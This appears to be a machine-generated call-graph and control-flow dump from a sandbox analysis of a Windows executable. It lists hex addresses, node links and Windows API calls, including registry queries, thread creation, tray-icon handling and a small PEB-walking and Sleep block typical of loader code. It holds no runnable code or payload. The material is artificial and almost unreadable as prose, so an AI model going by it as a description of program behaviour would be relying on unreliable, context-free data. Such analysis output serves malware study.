9f444f LoadLibraryA 97690->97692 97693 a33824 GetSystemInfo 97690->97693 97694 9f449c GetSystemInfo 97692->97694 97695 9f4460 GetProcAddress 97692->97695 97696 9f4476 97694->97696 97695->97694 97697 9f4470 GetNativeSystemInfo 97695->97697 97698 9f447a FreeLibrary 97696->97698 97699 9f109d 97696->97699 97697->97696 97698->97699 97700 a100a3 29 API calls __onexit 97699->97700 97700->97679 97701 9f2e37 97702 9fa961 22 API calls 97701->97702 97703 9f2e4d 97702->97703 97780 9f4ae3 97703->97780 97705 9f2e6b 97706 9f3a5a 24 API calls 97705->97706 97707 9f2e7f 97706->97707 97708 9f9cb3 22 API calls 97707->97708 97709 9f2e8c 97708->97709 97710 9f4ecb 94 API calls 97709->97710 97711 9f2ea5 97710->97711 97712 9f2ead 97711->97712 97713 a32cb0 97711->97713 97716 9fa8c7 22 API calls 97712->97716 97810 a62cf9 97713->97810 97715 a32cc3 97717 a32ccf 97715->97717 97719 9f4f39 68 API calls 97715->97719 97718 9f2ec3 97716->97718 97722 9f4f39 68 API calls 97717->97722 97794 9f6f88 22 API calls 97718->97794 97719->97717 97721 9f2ecf 97723 9f9cb3 22 API calls 97721->97723 97724 a32ce5 97722->97724 97725 9f2edc 97723->97725 97836 9f3084 22 API calls 97724->97836 97795 9fa81b 41 API calls 97725->97795 97728 9f2eec 97730 9f9cb3 22 API calls 97728->97730 97729 a32d02 97837 9f3084 22 API calls 97729->97837 97732 9f2f12 97730->97732 97796 9fa81b 41 API calls 97732->97796 97733 a32d1e 97735 9f3a5a 24 API calls 97733->97735 97737 a32d44 97735->97737 97736 9f2f21 97739 9fa961 22 API calls 97736->97739 97838 9f3084 22 API calls 97737->97838 97741 9f2f3f 97739->97741 97740 a32d50 97742 9fa8c7 22 API calls 97740->97742 97797 9f3084 22 API calls 97741->97797 97744 a32d5e 97742->97744 97839 9f3084 22 API calls 97744->97839 97746 9f2f4b 97798 a14a28 40 API calls 3 library calls 97746->97798 97747 a32d6d 97751 9fa8c7 22 API calls 97747->97751 97749 9f2f59 97749->97724 97750 9f2f63 97749->97750 97799 a14a28 40 API calls 3 library calls 97750->97799 97753 a32d83 97751->97753 97840 9f3084 22 API calls 97753->97840 97754 9f2f6e 97754->97729 97756 9f2f78 97754->97756 97800 a14a28 40 API calls 3 library calls 97756->97800 97757 a32d90 97759 9f2f83 97759->97733 97760 9f2f8d 97759->97760 97801 a14a28 40 API calls 3 library calls 97760->97801 97762 9f2fdc 97762->97747 97764 9f2fe8 97762->97764 97763 9f2f98 97763->97762 97802 9f3084 22 API calls 97763->97802 97764->97757 97804 9f63eb 22 API calls 97764->97804 97766 9f2fbf 97768 9fa8c7 22 API calls 97766->97768 97770 9f2fcd 97768->97770 97769 9f2ff8 97805 9f6a50 22 API calls 97769->97805 97803 9f3084 22 API calls 97770->97803 97773 9f3006 97806 9f70b0 23 API calls 97773->97806 97777 9f3021 97778 9f3065 97777->97778 97807 9f6f88 22 API calls 97777->97807 97808 9f70b0 23 API calls 97777->97808 97809 9f3084 22 API calls 97777->97809 97781 9f4af0 __wsopen_s 97780->97781 97782 9f6b57 22 API calls 97781->97782 97783 9f4b22 97781->97783 97782->97783 97784 9f4c6d 22 API calls 97783->97784 97790 9f4b58 97783->97790 97784->97783 97785 9f4c6d 22 API calls 97785->97790 97786 9f9cb3 22 API calls 97788 9f4c52 97786->97788 97787 9f9cb3 22 API calls 97787->97790 97789 9f515f 22 API calls 97788->97789 97792 9f4c5e 97789->97792 97790->97785 97790->97787 97791 9f515f 22 API calls 97790->97791 97793 9f4c29 97790->97793 97791->97790 97792->97705 97793->97786 97793->97792 97794->97721 97795->97728 97796->97736 97797->97746 97798->97749 97799->97754 97800->97759 97801->97763 97802->97766 97803->97762 97804->97769 97805->97773 97806->97777 97807->97777 97808->97777 97809->97777 97811 a62d15 97810->97811 97812 9f511f 64 API calls 97811->97812 97813 a62d29 97812->97813 97814 a62e66 75 API calls 97813->97814 97815 a62d3b 97814->97815 97816 9f50f5 40 API calls 97815->97816 97834 a62d3f 97815->97834 97817 a62d56 97816->97817 97818 9f50f5 40 API calls 97817->97818 97819 a62d66 97818->97819 97820 9f50f5 40 API calls 97819->97820 97821 a62d81 97820->97821 97822 9f50f5 40 API calls 97821->97822 97823 a62d9c 97822->97823 97824 9f511f 64 API calls 97823->97824 97825 a62db3 97824->97825 97826 a1ea0c ___std_exception_copy 21 API calls 97825->97826 97827 a62dba 97826->97827 97828 a1ea0c ___std_exception_copy 21 API calls 97827->97828 97829 a62dc4 97828->97829 97830 9f50f5 40 API calls 97829->97830 97831 a62dd8 97830->97831 97832 a628fe 27 API calls 97831->97832 97833 a62dee 97832->97833 97833->97834 97835 a622ce 79 API calls 97833->97835 97834->97715 97835->97834 97836->97729 97837->97733 97838->97740 97839->97747 97840->97757 97841 a103e9 97846 a109d5 SetUnhandledExceptionFilter 97841->97846 97843 a103ee pre_c_initialization 97847 a14fa9 26 API calls 2 library calls 97843->97847 97845 a103f9 97846->97843 97847->97845 97848 9f3156 97851 9f3170 97848->97851 97852 9f3187 97851->97852 97853 9f318c 97852->97853 97854 9f31eb 97852->97854 97892 9f31e9 97852->97892 97858 9f3199 97853->97858 97859 9f3265 PostQuitMessage 97853->97859 97856 a32dfb 97854->97856 97857 9f31f1 97854->97857 97855 9f31d0 DefWindowProcW 97865 9f316a 97855->97865 97900 9f18e2 10 API calls 97856->97900 97860 9f321d SetTimer RegisterWindowMessageW 97857->97860 97861 9f31f8 97857->97861 97863 9f31a4 97858->97863 97864 a32e7c 97858->97864 97859->97865 97860->97865 97869 9f3246 CreatePopupMenu 97860->97869 97866 9f3201 KillTimer 97861->97866 97867 a32d9c 97861->97867 97870 9f31ae 97863->97870 97871 a32e68 97863->97871 97906 a5bf30 34 API calls ___scrt_fastfail 97864->97906 97896 9f30f2 Shell_NotifyIconW ___scrt_fastfail 97866->97896 97879 a32da1 97867->97879 97880 a32dd7 MoveWindow 97867->97880 97868 a32e1c 97901 a0e499 42 API calls 97868->97901 97869->97865 97876 9f31b9 97870->97876 97877 a32e4d 97870->97877 97905 a5c161 27 API calls ___scrt_fastfail 97871->97905 97885 9f31c4 97876->97885 97886 9f3253 97876->97886 97877->97855 97904 a50ad7 22 API calls 97877->97904 97878 a32e8e 97878->97855 97878->97865 97881 a32da7 97879->97881 97882 a32dc6 SetFocus 97879->97882 97880->97865 97881->97885 97887 a32db0 97881->97887 97882->97865 97883 9f3214 97897 9f3c50 DeleteObject DestroyWindow 97883->97897 97884 9f3263 97884->97865 97885->97855 97902 9f30f2 Shell_NotifyIconW ___scrt_fastfail 97885->97902 97898 9f326f 44 API calls ___scrt_fastfail 97886->97898 97899 9f18e2 10 API calls 97887->97899 97892->97855 97894 a32e41 97903 9f3837 49 API calls ___scrt_fastfail 97894->97903 97896->97883 97897->97865 97898->97884 97899->97865 97900->97868 97901->97885 97902->97894 97903->97892 97904->97892 97905->97884 97906->97878 97907 9f1033 97912 9f4c91 97907->97912 97911 9f1042 97913 9fa961 22 API calls 97912->97913 97914 9f4cff 97913->97914 97920 9f3af0 97914->97920 97917 9f4d9c 97918 9f1038 97917->97918 97923 9f51f7 22 API calls __fread_nolock 97917->97923 97919 a100a3 29 API calls __onexit 97918->97919 97919->97911 97924 9f3b1c 97920->97924 97923->97917 97925 9f3b0f 97924->97925 97926 9f3b29 97924->97926 97925->97917 97926->97925 97927 9f3b30 RegOpenKeyExW 97926->97927 97927->97925 97928 9f3b4a RegQueryValueExW 97927->97928 97929 9f3b6b 97928->97929 97930 9f3b80 RegCloseKey 97928->97930 97929->97930 97930->97925 97931 9f1cad SystemParametersInfoW 97932 a290fa 97933 a29107 97932->97933 97937 a2911f 97932->97937 97982 a1f2d9 20 API calls _abort 97933->97982 97935 a2910c 97983 a227ec 26 API calls _abort 97935->97983 97938 a2917a 97937->97938 97946 a29117 97937->97946 97984 a2fdc4 21 API calls 2 library calls 97937->97984 97940 a1d955 __fread_nolock 26 API calls 97938->97940 97941 a29192 97940->97941 97952 a28c32 97941->97952 97943 a29199 97944 a1d955 __fread_nolock 26 API calls 97943->97944 97943->97946 97945 a291c5 97944->97945 97945->97946 97947 a1d955 __fread_nolock 26 API calls 97945->97947 97948 a291d3 97947->97948 97948->97946 97949 a1d955 __fread_nolock 26 API calls 97948->97949 97950 a291e3 97949->97950 97951 a1d955 __fread_nolock 26 API calls 97950->97951 97951->97946 97953 a28c3e ___scrt_is_nonwritable_in_current_image 97952->97953 97954 a28c46 97953->97954 97955 a28c5e 97953->97955 97986 a1f2c6 20 API calls _abort 97954->97986 97956 a28d24 97955->97956 97961 a28c97 97955->97961 97993 a1f2c6 20 API calls _abort 97956->97993 97958 a28c4b 97987 a1f2d9 20 API calls _abort 97958->97987 97963 a28ca6 97961->97963 97964 a28cbb 97961->97964 97962 a28d29 97994 a1f2d9 20 API calls _abort 97962->97994 97988 a1f2c6 20 API calls _abort 97963->97988 97985 a25147 EnterCriticalSection 97964->97985 97968 a28cb3 97995 a227ec 26 API calls _abort 97968->97995 97969 a28c53 __wsopen_s 97969->97943 97970 a28cab 97989 a1f2d9 20 API calls _abort 97970->97989 97971 a28cc1 97974 a28cf2 97971->97974 97975 a28cdd 97971->97975 97977 a28d45 __fread_nolock 38 API calls 97974->97977 97990 a1f2d9 20 API calls _abort 97975->97990 97979 a28ced 97977->97979 97978 a28ce2 97991 a1f2c6 20 API calls _abort 97978->97991 97992 a28d1c LeaveCriticalSection __wsopen_s 97979->97992 97982->97935 97983->97946 97984->97938 97985->97971 97986->97958 97987->97969 97988->97970 97989->97968 97990->97978 97991->97979 97992->97969 97993->97962 97994->97968 97995->97969 97996 192440 98010 190000 97996->98010 97998 1924df 98013 192330 97998->98013 98016 193520 GetPEB 98010->98016 98012 19068b 98012->97998 98014 192339 Sleep 98013->98014 98015 192347 98014->98015 98017 19354a 98016->98017 98017->98012 98018 9f6a26 98019 a0fddb 22 API calls 98018->98019 98020 9f6a33 98019->98020 98021 9fdee5 98024 9fb710 98021->98024 98025 9fb72b 98024->98025 98026 a40146 98025->98026 98027 a400f8 98025->98027 98046 9fb750 98025->98046 98066 a758a2 256 API calls 2 library calls 98026->98066 98030 a40102 98027->98030 98033 a4010f 98027->98033 98027->98046 98064 a75d33 256 API calls 98030->98064 98045 9fba20 98033->98045 98065 a761d0 256 API calls 2 library calls 98033->98065 98036 a0d336 40 API calls 98036->98046 98037 a403d9 98037->98037 98040 9fba4e 98042 a40322 98069 a75c0c 82 API calls 98042->98069 98045->98040 98070 a6359c 82 API calls __wsopen_s 98045->98070 98046->98036 98046->98040 98046->98042 98046->98045 98051 9fbbe0 40 API calls 98046->98051 98052 9fec40 256 API calls 98046->98052 98053 9fa8c7 22 API calls 98046->98053 98055 9fa81b 41 API calls 98046->98055 98056 a0d2f0 40 API calls 98046->98056 98057 a0a01b 256 API calls 98046->98057 98058 a10242 5 API calls __Init_thread_wait 98046->98058 98059 a0edcd 22 API calls 98046->98059 98060 a100a3 29 API calls __onexit 98046->98060 98061 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98046->98061 98062 a0ee53 82 API calls 98046->98062 98063 a0e5ca 256 API calls 98046->98063 98067 9faceb 23 API calls messages 98046->98067 98068 a4f6bf 23 API calls 98046->98068 98051->98046 98052->98046 98053->98046 98055->98046 98056->98046 98057->98046 98058->98046 98059->98046 98060->98046 98061->98046 98062->98046 98063->98046 98064->98033 98065->98045 98066->98046 98067->98046 98068->98046 98069->98045 98070->98037 98071 a103fb 98072 a10407 ___scrt_is_nonwritable_in_current_image 98071->98072 98100 a0feb1 98072->98100 98074 a1040e 98075 a10561 98074->98075 98078 a10438 98074->98078 98127 a1083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98075->98127 98077 a10568 98128 a14e52 28 API calls _abort 98077->98128 98087 a10477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98078->98087 98111 a2247d 98078->98111 98080 a1056e 98129 a14e04 28 API calls _abort 98080->98129 98084 a10576 98085 a10457 98091 a104d8 98087->98091 98123 a14e1a 38 API calls 2 library calls 98087->98123 98089 a104de 98092 a104f3 98089->98092 98119 a10959 98091->98119 98124 a10992 GetModuleHandleW 98092->98124 98094 a104fa 98094->98077 98095 a104fe 98094->98095 98096 a10507 98095->98096 98125 a14df5 28 API calls _abort 98095->98125 98126 a10040 13 API calls 2 library calls 98096->98126 98099 a1050f 98099->98085 98101 a0feba 98100->98101 98130 a10698 IsProcessorFeaturePresent 98101->98130 98103 a0fec6 98131 a12c94 98103->98131 98105 a0fecb 98110 a0fecf 98105->98110 98140 a22317 98105->98140 98108 a0fee6 98108->98074 98110->98074 98112 a22494 98111->98112 98113 a10a8c _ValidateLocalCookies 5 API calls 98112->98113 98114 a10451 98113->98114 98114->98085 98115 a22421 98114->98115 98116 a22450 98115->98116 98117 a10a8c _ValidateLocalCookies 5 API calls 98116->98117 98118 a22479 98117->98118 98118->98087 98225 a12340 98119->98225 98121 a1096c GetStartupInfoW 98122 a1097f 98121->98122 98122->98089 98123->98091 98124->98094 98125->98096 98126->98099 98127->98077 98128->98080 98129->98084 98130->98103 98132 a12c99 ___vcrt_initialize_winapi_thunks 98131->98132 98144 a13462 98132->98144 98135 a12ca7 98135->98105 98137 a12caf 98138 a12cba 98137->98138 98158 a1349e DeleteCriticalSection 98137->98158 98138->98105 98186 a2d1f6 98140->98186 98143 a12cbd 8 API calls 3 library calls 98143->98110 98145 a1346b 98144->98145 98147 a13494 98145->98147 98148 a12ca3 98145->98148 98159 a136ef 98145->98159 98164 a1349e DeleteCriticalSection 98147->98164 98148->98135 98150 a13414 98148->98150 98179 a13600 98150->98179 98153 a13429 98153->98137 98155 a13437 98156 a13444 98155->98156 98185 a13447 6 API calls ___vcrt_FlsFree 98155->98185 98156->98137 98158->98135 98165 a13591 98159->98165 98161 a13709 98162 a13727 InitializeCriticalSectionAndSpinCount 98161->98162 98163 a13712 98161->98163 98162->98163 98163->98145 98164->98148 98166 a135b5 __crt_fast_encode_pointer 98165->98166 98167 a135b9 98165->98167 98166->98161 98167->98166 98172 a134cd 98167->98172 98170 a135d3 GetProcAddress 98170->98166 98171 a135e3 __crt_fast_encode_pointer 98170->98171 98171->98166 98177 a134dc try_get_first_available_module 98172->98177 98173 a13586 98173->98166 98173->98170 98174 a134f9 LoadLibraryExW 98175 a13514 GetLastError 98174->98175 98174->98177 98175->98177 98176 a1356f FreeLibrary 98176->98177 98177->98173 98177->98174 98177->98176 98178 a13547 LoadLibraryExW 98177->98178 98178->98177 98180 a13591 try_get_function 5 API calls 98179->98180 98181 a1361a 98180->98181 98182 a13633 TlsAlloc 98181->98182 98183 a1341e 98181->98183 98183->98153 98184 a136b1 6 API calls try_get_function 98183->98184 98184->98155 98185->98153 98189 a2d213 98186->98189 98190 a2d20f 98186->98190 98187 a10a8c _ValidateLocalCookies 5 API calls 98188 a0fed8 98187->98188 98188->98108 98188->98143 98189->98190 98192 a24bfb 98189->98192 98190->98187 98193 a24c07 ___scrt_is_nonwritable_in_current_image 98192->98193 98204 a22f5e EnterCriticalSection 98193->98204 98195 a24c0e 98205 a250af 98195->98205 98197 a24c1d 98203 a24c2c 98197->98203 98218 a24a8f 29 API calls 98197->98218 98200 a24c27 98219 a24b45 GetStdHandle GetFileType 98200->98219 98201 a24c3d __wsopen_s 98201->98189 98220 a24c48 LeaveCriticalSection _abort 98203->98220 98204->98195 98206 a250bb ___scrt_is_nonwritable_in_current_image 98205->98206 98207 a250c8 98206->98207 98208 a250df 98206->98208 98222 a1f2d9 20 API calls _abort 98207->98222 98221 a22f5e EnterCriticalSection 98208->98221 98211 a250cd 98223 a227ec 26 API calls _abort 98211->98223 98213 a25117 98224 a2513e LeaveCriticalSection _abort 98213->98224 98214 a250d7 __wsopen_s 98214->98197 98215 a250eb 98215->98213 98217 a25000 __wsopen_s 21 API calls 98215->98217 98217->98215 98218->98200 98219->98203 98220->98201 98221->98215 98222->98211 98223->98214 98224->98214 98225->98121 98226 9f1044 98231 9f10f3 98226->98231 98228 9f104a 98267 a100a3 29 API calls __onexit 98228->98267 98230 9f1054 98268 9f1398 98231->98268 98235 9f116a 98236 9fa961 22 API calls 98235->98236 98237 9f1174 98236->98237 98238 9fa961 22 API calls 98237->98238 98239 9f117e 98238->98239 98240 9fa961 22 API calls 98239->98240 98241 9f1188 98240->98241 98242 9fa961 22 API calls 98241->98242 98243 9f11c6 98242->98243 98244 9fa961 22 API calls 98243->98244 98245 9f1292 98244->98245 98278 9f171c 98245->98278 98249 9f12c4 98250 9fa961 22 API calls 98249->98250 98251 9f12ce 98250->98251 98252 a01940 9 API calls 98251->98252 98253 9f12f9 98252->98253 98299 9f1aab 98253->98299 98255 9f1315 98256 9f1325 GetStdHandle 98255->98256 98257 9f137a 98256->98257 98258 a32485 98256->98258 98261 9f1387 OleInitialize 98257->98261 98258->98257 98259 a3248e 98258->98259 98260 a0fddb 22 API calls 98259->98260 98262 a32495 98260->98262 98261->98228 98306 a6011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98262->98306 98264 a3249e 98307 a60944 CreateThread 98264->98307 98266 a324aa CloseHandle 98266->98257 98267->98230 98308 9f13f1 98268->98308 98271 9f13f1 22 API calls 98272 9f13d0 98271->98272 98273 9fa961 22 API calls 98272->98273 98274 9f13dc 98273->98274 98275 9f6b57 22 API calls 98274->98275 98276 9f1129 98275->98276 98277 9f1bc3 6 API calls 98276->98277 98277->98235 98279 9fa961 22 API calls 98278->98279 98280 9f172c 98279->98280 98281 9fa961 22 API calls 98280->98281 98282 9f1734 98281->98282 98283 9fa961 22 API calls 98282->98283 98284 9f174f 98283->98284 98285 a0fddb 22 API calls 98284->98285 98286 9f129c 98285->98286 98287 9f1b4a 98286->98287 98288 9f1b58 98287->98288 98289 9fa961 22 API calls 98288->98289 98290 9f1b63 98289->98290 98291 9fa961 22 API calls 98290->98291 98292 9f1b6e 98291->98292 98293 9fa961 22 API calls 98292->98293 98294 9f1b79 98293->98294 98295 9fa961 22 API calls 98294->98295 98296 9f1b84 98295->98296 98297 a0fddb 22 API calls 98296->98297 98298 9f1b96 RegisterWindowMessageW 98297->98298 98298->98249 98300 9f1abb 98299->98300 98301 a3272d 98299->98301 98302 a0fddb 22 API calls 98300->98302 98315 a63209 23 API calls 98301->98315 98304 9f1ac3 98302->98304 98304->98255 98305 a32738 98306->98264 98307->98266 98316 a6092a 28 API calls 98307->98316 98309 9fa961 22 API calls 98308->98309 98310 9f13fc 98309->98310 98311 9fa961 22 API calls 98310->98311 98312 9f1404 98311->98312 98313 9fa961 22 API calls 98312->98313 98314 9f13c6 98313->98314 98314->98271 98315->98305 98317 9f2de3 98318 9f2df0 __wsopen_s 98317->98318 98319 9f2e09 98318->98319 98320 a32c2b ___scrt_fastfail 98318->98320 98321 9f3aa2 23 API calls 98319->98321 98323 a32c47 GetOpenFileNameW 98320->98323 98322 9f2e12 98321->98322 98333 9f2da5 98322->98333 98325 a32c96 98323->98325 98326 9f6b57 22 API calls 98325->98326 98328 a32cab 98326->98328 98328->98328 98330 9f2e27 98351 9f44a8 98330->98351 98334 a31f50 __wsopen_s 98333->98334 98335 9f2db2 GetLongPathNameW 98334->98335 98336 9f6b57 22 API calls 98335->98336 98337 9f2dda 98336->98337 98338 9f3598 98337->98338 98339 9fa961 22 API calls 98338->98339 98340 9f35aa 98339->98340 98341 9f3aa2 23 API calls 98340->98341 98342 9f35b5 98341->98342 98343 9f35c0 98342->98343 98346 a332eb 98342->98346 98345 9f515f 22 API calls 98343->98345 98347 9f35cc 98345->98347 98348 a3330d 98346->98348 98386 a0ce60 41 API calls 98346->98386 98380 9f35f3 98347->98380 98350 9f35df 98350->98330 98352 9f4ecb 94 API calls 98351->98352 98353 9f44cd 98352->98353 98354 a33833 98353->98354 98356 9f4ecb 94 API calls 98353->98356 98355 a62cf9 80 API calls 98354->98355 98357 a33848 98355->98357 98358 9f44e1 98356->98358 98360 a33869 98357->98360 98361 a3384c 98357->98361 98358->98354 98359 9f44e9 98358->98359 98362 a33854 98359->98362 98363 9f44f5 98359->98363 98365 a0fe0b 22 API calls 98360->98365 98364 9f4f39 68 API calls 98361->98364 98388 a5da5a 82 API calls 98362->98388 98387 9f940c 136 API calls 2 library calls 98363->98387 98364->98362 98373 a338ae 98365->98373 98368 9f2e31 98369 a33862 98369->98360 98370 9f4f39 68 API calls 98374 a33a5f 98370->98374 98373->98374 98377 9f9cb3 22 API calls 98373->98377 98389 a5967e 22 API calls __fread_nolock 98373->98389 98390 a595ad 42 API calls _wcslen 98373->98390 98391 a60b5a 22 API calls 98373->98391 98392 9fa4a1 22 API calls __fread_nolock 98373->98392 98393 9f3ff7 22 API calls 98373->98393 98374->98370 98394 a5989b 82 API calls __wsopen_s 98374->98394 98377->98373 98381 9f3605 98380->98381 98385 9f3624 __fread_nolock 98380->98385 98383 a0fe0b 22 API calls 98381->98383 98382 a0fddb 22 API calls 98384 9f363b 98382->98384 98383->98385 98384->98350 98385->98382 98386->98346 98387->98368 98388->98369 98389->98373 98390->98373 98391->98373 98392->98373 98393->98373 98394->98374 98395 a00b9d 98400 a00ba6 __fread_nolock 98395->98400 98396 9f7510 53 API calls 98396->98400 98397 a45cb8 98407 9f4a88 22 API calls __fread_nolock 98397->98407 98399 a45cc4 98404 9fa8c7 22 API calls 98399->98404 98405 a00847 __fread_nolock 98399->98405 98400->98396 98400->98397 98401 a00bf7 98400->98401 98402 a0fddb 22 API calls 98400->98402 98400->98405 98406 a0fe0b 22 API calls 98400->98406 98403 9fa587 22 API calls 98401->98403 98402->98400 98403->98405 98404->98405 98406->98400 98407->98399 98408 a2cabc 98409 a2cace 98408->98409 98410 a2cac5 98408->98410 98412 a2c9bb 98410->98412 98432 a22d74 GetLastError 98412->98432 98414 a2c9c8 98452 a2cada 98414->98452 98416 a2c9d0 98461 a2c74f 98416->98461 98419 a2c9e7 98419->98409 98420 a23820 _strftime 21 API calls 98421 a2c9f8 98420->98421 98422 a2ca2a 98421->98422 98468 a2cb7c 98421->98468 98425 a229c8 _free 20 API calls 98422->98425 98425->98419 98426 a2ca25 98478 a1f2d9 20 API calls _abort 98426->98478 98428 a2ca6e 98428->98422 98479 a2c625 26 API calls 98428->98479 98429 a2ca42 98429->98428 98430 a229c8 _free 20 API calls 98429->98430 98430->98428 98433 a22d90 98432->98433 98434 a22d8a 98432->98434 98436 a24c7d _abort 20 API calls 98433->98436 98438 a22ddf SetLastError 98433->98438 98480 a2320e 11 API calls 2 library calls 98434->98480 98437 a22da2 98436->98437 98439 a22daa 98437->98439 98481 a23264 11 API calls 2 library calls 98437->98481 98438->98414 98441 a229c8 _free 20 API calls 98439->98441 98444 a22db0 98441->98444 98442 a22dbf 98442->98439 98443 a22dc6 98442->98443 98482 a22be6 20 API calls _abort 98443->98482 98446 a22deb SetLastError 98444->98446 98483 a228a7 38 API calls _abort 98446->98483 98447 a22dd1 98449 a229c8 _free 20 API calls 98447->98449 98451 a22dd8 98449->98451 98451->98438 98451->98446 98453 a2cae6 ___scrt_is_nonwritable_in_current_image 98452->98453 98454 a22d74 _abort 38 API calls 98453->98454 98459 a2caf0 98454->98459 98456 a2cb74 __wsopen_s 98456->98416 98459->98456 98460 a229c8 _free 20 API calls 98459->98460 98484 a228a7 38 API calls _abort 98459->98484 98485 a22f5e EnterCriticalSection 98459->98485 98486 a2cb6b LeaveCriticalSection _abort 98459->98486 98460->98459 98487 a149a5 98461->98487 98464 a2c782 98466 a2c787 GetACP 98464->98466 98467 a2c799 98464->98467 98465 a2c770 GetOEMCP 98465->98467 98466->98467 98467->98419 98467->98420 98469 a2c74f 40 API calls 98468->98469 98471 a2cb9b 98469->98471 98470 a10a8c _ValidateLocalCookies 5 API calls 98472 a2ca1d 98470->98472 98473 a2cbec IsValidCodePage 98471->98473 98475 a2cba2 98471->98475 98477 a2cc11 ___scrt_fastfail 98471->98477 98472->98426 98472->98429 98474 a2cbfe GetCPInfo 98473->98474 98473->98475 98474->98475 98474->98477 98475->98470 98497 a2c827 GetCPInfo 98477->98497 98478->98422 98479->98422 98480->98433 98481->98442 98482->98447 98485->98459 98486->98459 98488 a149c2 98487->98488 98489 a149b8 98487->98489 98488->98489 98490 a22d74 _abort 38 API calls 98488->98490 98489->98464 98489->98465 98491 a149e3 98490->98491 98495 a22ec3 38 API calls __fassign 98491->98495 98493 a149fc 98496 a22ef0 38 API calls __fassign 98493->98496 98495->98493 98496->98489 98498 a2c861 98497->98498 98506 a2c90b 98497->98506 98507 a2d8c3 98498->98507 98501 a10a8c _ValidateLocalCookies 5 API calls 98503 a2c9b7 98501->98503 98503->98475 98505 a2641b 43 API calls 98505->98506 98506->98501 98508 a149a5 __fassign 38 API calls 98507->98508 98509 a2d8e3 MultiByteToWideChar 98508->98509 98511 a2d921 98509->98511 98518 a2d9b9 98509->98518 98513 a23820 _strftime 21 API calls 98511->98513 98517 a2d942 _strftime ___scrt_fastfail 98511->98517 98512 a10a8c _ValidateLocalCookies 5 API calls 98514 a2c8c2 98512->98514 98513->98517 98521 a2641b 98514->98521 98515 a2d9b3 98526 a21537 20 API calls _free 98515->98526 98517->98515 98519 a2d987 MultiByteToWideChar 98517->98519 98518->98512 98519->98515 98520 a2d9a3 GetStringTypeW 98519->98520 98520->98515 98522 a149a5 __fassign 38 API calls 98521->98522 98523 a2642e 98522->98523 98527 a261fe 98523->98527 98526->98518 98528 a26219 98527->98528 98529 a2623f MultiByteToWideChar 98528->98529 98530 a263f3 98529->98530 98531 a26269 98529->98531 98532 a10a8c _ValidateLocalCookies 5 API calls 98530->98532 98536 a23820 _strftime 21 API calls 98531->98536 98538 a2628a _strftime 98531->98538 98533 a26406 98532->98533 98533->98505 98534 a262d3 MultiByteToWideChar 98535 a2633f 98534->98535 98537 a262ec 98534->98537 98563 a21537 20 API calls _free 98535->98563 98536->98538 98554 a23467 98537->98554 98538->98534 98538->98535 98542 a26316 98542->98535 98545 a23467 _strftime 11 API calls 98542->98545 98543 a2634e 98544 a23820 _strftime 21 API calls 98543->98544 98548 a2636f _strftime 98543->98548 98544->98548 98545->98535 98546 a263e4 98562 a21537 20 API calls _free 98546->98562 98548->98546 98549 a23467 _strftime 11 API calls 98548->98549 98550 a263c3 98549->98550 98550->98546 98551 a263d2 WideCharToMultiByte 98550->98551 98551->98546 98552 a26412 98551->98552 98564 a21537 20 API calls _free 98552->98564 98555 a22fd7 _abort 5 API calls 98554->98555 98556 a2348e 98555->98556 98558 a23497 98556->98558 98565 a234ef 10 API calls 3 library calls 98556->98565 98560 a10a8c _ValidateLocalCookies 5 API calls 98558->98560 98559 a234d7 LCMapStringW 98559->98558 98561 a234e9 98560->98561 98561->98535 98561->98542 98561->98543 98562->98535 98563->98530 98564->98535 98565->98559 98566 a22e7d 98574 a23162 98566->98574 98569 a22e91 98571 a22e99 98572 a22ea6 98571->98572 98582 a22ea9 11 API calls 98571->98582 98575 a22fd7 _abort 5 API calls 98574->98575 98576 a23189 98575->98576 98577 a231a1 TlsAlloc 98576->98577 98578 a23192 98576->98578 98577->98578 98579 a10a8c _ValidateLocalCookies 5 API calls 98578->98579 98580 a22e87 98579->98580 98580->98569 98581 a22df8 20 API calls 2 library calls 98580->98581 98581->98571 98582->98569

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 237 9f42de-9f434d call 9fa961 GetVersionExW call 9f6b57 242 a33617-a3362a 237->242 243 9f4353 237->243 244 a3362b-a3362f 242->244 245 9f4355-9f4357 243->245 246 a33632-a3363e 244->246 247 a33631 244->247 248 9f435d-9f43bc call 9f93b2 call 9f37a0 245->248 249 a33656 245->249 246->244 251 a33640-a33642 246->251 247->246 265 a337df-a337e6 248->265 266 9f43c2-9f43c4 248->266 254 a3365d-a33660 249->254 251->245 253 a33648-a3364f 251->253 253->242 258 a33651 253->258 255 9f441b-9f4435 GetCurrentProcess IsWow64Process 254->255 256 a33666-a336a8 254->256 261 9f4437 255->261 262 9f4494-9f449a 255->262 256->255 259 a336ae-a336b1 256->259 258->249 263 a336b3-a336bd 259->263 264 a336db-a336e5 259->264 267 9f443d-9f4449 261->267 262->267 268 a336ca-a336d6 263->268 269 a336bf-a336c5 263->269 271 a336e7-a336f3 264->271 272 a336f8-a33702 264->272 273 a33806-a33809 265->273 274 a337e8 265->274 266->254 270 9f43ca-9f43dd 266->270 275 9f444f-9f445e LoadLibraryA 267->275 276 a33824-a33828 GetSystemInfo 267->276 268->255 269->255 277 a33726-a3372f 270->277 278 9f43e3-9f43e5 270->278 271->255 280 a33715-a33721 272->280 281 a33704-a33710 272->281 282 a337f4-a337fc 273->282 283 a3380b-a3381a 273->283 279 a337ee 274->279 284 9f449c-9f44a6 GetSystemInfo 275->284 285 9f4460-9f446e GetProcAddress 275->285 289 a33731-a33737 277->289 290 a3373c-a33748 277->290 287 9f43eb-9f43ee 278->287 288 a3374d-a33762 278->288 279->282 280->255 281->255 282->273 283->279 291 a3381c-a33822 283->291 286 9f4476-9f4478 284->286 285->284 292 9f4470-9f4474 GetNativeSystemInfo 285->292 293 9f447a-9f447b FreeLibrary 286->293 294 9f4481-9f4493 286->294 295 a33791-a33794 287->295 296 9f43f4-9f440f 287->296 297 a33764-a3376a 288->297 298 a3376f-a3377b 288->298 289->255 290->255 291->282 292->286 293->294 295->255 299 a3379a-a337c1 295->299 300 a33780-a3378c 296->300 301 9f4415 296->301 297->255 298->255 302 a337c3-a337c9 299->302 303 a337ce-a337da 299->303 300->255 301->255 302->255 303->255
                                                                                              APIs
